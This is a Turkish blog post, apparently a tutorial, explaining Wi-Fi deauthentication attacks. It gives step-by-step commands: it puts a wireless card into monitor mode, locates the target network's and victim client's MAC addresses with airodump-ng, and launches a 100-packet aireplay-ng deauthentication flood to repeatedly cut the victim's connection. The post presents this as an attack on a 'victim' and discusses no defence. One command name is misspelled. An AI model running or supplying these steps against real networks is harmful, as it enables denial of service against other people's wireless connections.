Kablosuz Ağlarda Deauthentication Saldırısı

Bir istemci bağlı olduğu kablosuz ağ ile olan bağlantısını koparmak istediğinde bağlantıyı kopar butonuna basarak aralarındaki ilişkiyi sonlandırır.İşin arka tarafına bakıldığında istemci kablosuz ağa bir deauthentication paketi gönderir ve bağlantı sonlandırılır.


(Örnek bir deauthentication paketi)

Eğer başkasının adına bağlı olduğu kablosuz ağa deauthentication paketleri gönderilirse kurbanın bağlantısı sürekli olarak kopacaktır.

(Saldırının görselleştirilmiş hali)

 

Yukarıdaki örnek deauthentication paketi incelendiğinde paketin gönderen ve alıcı bilgisi için MAC adresi kullanılmıştır.Yani mac adresimizi kurbanınki ile değiştirirsek onun adına paketler oluşturabiliriz.Hedefin ve kablosuz ağın mac adresini öğrenmek için ortamdaki paketleri yakalayacağız.Bunun için kablosuz ağ kartımızı monitor moda alıyoruz.

 

ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up

Ardından monitör moda aldığımız ağ kartı ile birlikte ortamdaki paketleri dinleyerek hedefimize ait mac adresini bulmamız lazım.Wireshark ile ortamdaki tüm paketleri dinleyip arasından işimize yarayanları ayıklamak uzun süreceği için Python’da bulunan scapy kütüphanesi ile kısa bir script yazdım.Bu script ile ortamdaki kablosuz ağların mac adreslerini elde ediyoruz.

(scan.py kaynak kodları için tıklayınız)

 

Veya airodump aracı kullanılarak ortamdaki kablosuz ağlar listelenebilir.

 

airodumo-ng wlan1

Kablosuz ağın mac adresini elde ettikten sonra ağ içerisindeki istemcileri bulmak için tekrar airodump aracını kullanıyoruz.

 

airodump-ng --bssid 26:E3:14:4B:65:26  wlan1

(–bssid parametresinden sonra hedef ağın mac adresi girilir)

Yukarıdaki komut ile belirtilen kablosuz ağa bağlı olan istemcilerin mac adresleri listelenir.

Artık elimizde kurbanın ve kablosuz ağın mac adresi olduğuna göre deauthentication saldırısını başlatabiliriz.

 

aireplay-ng -0 100 -a 26:E3:14:4B:65:26 -c A0:C5:89:57:D2:12 wlan1

-0 Deauthentication saldırısını
100 gönderilen paket sayısını
-a kablosuz ağın mac adresini
-c istemcinin mac adresini temsil etmektedir.

Saldırı başlatıldıktan sonra kurbanın ağ ile olan bağlantısı kopmuş olacaktır.

İlk Yorumu Siz Yapın

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir